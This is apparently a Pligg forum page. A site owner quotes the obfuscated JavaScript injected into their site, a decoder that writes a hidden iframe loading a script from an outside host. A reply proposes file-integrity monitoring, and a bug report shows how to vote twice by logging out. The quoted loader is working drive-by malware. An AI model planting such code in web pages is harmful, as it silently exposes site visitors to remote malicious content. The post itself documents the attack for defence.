The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:
<script language=”javascript”>
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t=”;for(i=0;i<s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}
</script>

The second part runs the function passing it a string that gets parsed and written as the following:
<iframe src=”http://sexonline.fake.hu/10/js_go_f1.php” style=”display:none”></iframe>

The full encoded script that produces the above looks like:
<script language=javascript>
document.write(unescape(‘%3C%73%63%72%69%70%74%20% 6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%2 8%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61% 70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C %65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E% 6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72 %69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%2 8%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74 %68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2 E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74% 29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E’));dF(‘%286 Fliudph%2853vuf%286G%2855kwws%286D22vh%7Brqolqh1id nh1kx2432mvbjrbi41sks%2855%2853vw%7Coh%286G%2855gl vsod%7C%286Dqrqh%2855%286H%286F2liudph%286H3′);
</script>

I have run across this before on some of the high volume sites that I manage. There are a lot of resources to tell you how to block the IP addresses of the common attackers, but that can always change.

The one successful way that we were able to get around it was to put a script in place that will cache your clean file structure, monitor it, and disallow any changes to it unless specified in the config file. It cannot “stop” the hacer, but it will ensure that if they do get in they cannot be successful in contaminating your site and scaring off your visitors.

http://forums.pligg.com/general-help/14309-my-pligg-site-hacked-2.html

http://forums.pligg.com/bug-report/15119-minor-submit-same-story-url-twice.html

When an identified user votes, checks are made not to allow him to vote twice. This works as well when an anonymous user votes, on the IP basis.

But when an identified user votes, then disconnects (or open the app in an other browser), he can vote twice as anonymous.

This is a problem for all localized or specialized communities that have ten or so votes per link.

- tested version: 9.9.5

- way to reproduce:
1. login
2. vote
3. logout
4. vote

http://forums.pligg.com/bug-report/14871-double-vote-made-easy.html

http://forums.pligg.com/off-topic/15181-dollars5-disappeared.html

Visit: XSS vulnerability on comment?